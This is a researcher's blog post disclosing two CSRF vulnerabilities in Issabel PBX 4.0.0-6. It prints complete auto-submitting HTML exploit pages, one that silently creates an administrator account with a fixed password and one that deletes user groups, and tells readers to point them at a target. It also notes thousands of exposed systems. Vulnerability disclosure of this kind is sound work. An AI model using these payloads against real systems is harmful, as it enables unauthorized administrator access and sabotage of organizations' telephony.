Sahil OjhaPBX systems are the unsung heroes of telecommunication infrastructure, quietly humming away in the background of countless organizations worldwide. While they might not be as flashy as the latest smartphone or as trendy as social media platforms, these systems play a crucial role in facilitating seamless communication within businesses.
Next time you pick up a sleek VoIP phone in an office setting, take a moment to appreciate the unsung hero behind the scenes, the PBX (Private Branch Exchange) system, silently powering the conversations that drive businesses forward.
Beneath their unassuming exterior lies a vulnerability landscape worth exploring. Let's uncover some of the potential pitfalls hiding within these essential communication tools.
During a VAPT engagement, I stumbled upon the Issabel PBX software, which was used to manage all the telephony systems within that organization. I identified several vulnerabilities in that software, and when I looked into Shodan, I was surprised to find more than 6000 results of publicly exposed Issabel PBX systems.
I will share some of the interesting CVEs that I discovered, with steps of reproduction, to keep this blog short and maintain interest without overwhelming you.
CVE-2023-34839: forging a new administrator
A Cross Site Request Forgery flaw in Issabel PBX version 4.0.0-6 lets a remote attacker create a brand new administrator. The forged request fires silently the moment a logged in administrator opens a crafted page.
Steps of reproduction
Save the exploit below as an HTML file, change example.com to your target, and get a logged in administrator to open it in the same browser.
<html>
<!-- CSRF exploit to add admin user -->
<body>
<form action="https://example.com/index.php?menu=userlist&action=new" method="POST">
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="name" value="CSRF" />
<input type="hidden" name="description" value="CSRF" />
<input type="hidden" name="password1" value="Test@12345" />
<input type="hidden" name="password2" value="Test@12345" />
<input type="hidden" name="group" value="1" />
<input type="hidden" name="extension" value="" />
<input type="hidden" name="id_user" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>The moment the page loads, a new admin account appears, in my proof of concept with the password Test@12345, ready to use.
CVE-2023-34837: deleting user groups from afar
The same class of weakness lets an attacker delete user groups. When a logged in administrator opens the crafted page, the targeted group is removed, along with every role and privilege attached to it.
Steps of reproduction
Save the exploit below as an HTML file and get a logged in administrator to open it.
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/index.php?menu=grouplist" method="POST">
<input type="hidden" name="delete" value="Delete" />
<input type="hidden" name="id_group" value="7" />
<input type="submit" value="Submit request" />
</form>
</body>When the administrator opens the file, the user group named in the exploit is deleted automatically, and everyone in that group quietly loses their assigned roles and privileges.
Before the exploit runs
After the exploit runs
There were multiple other CSRF and Cross Site Scripting (XSS) issues in different features of the application, which can easily lead to account takeover, but I won't bother you with such a long blog. Please feel free to check out the other vulnerabilities related to this product that I discovered through the link given below.
Stay curious.
Sahil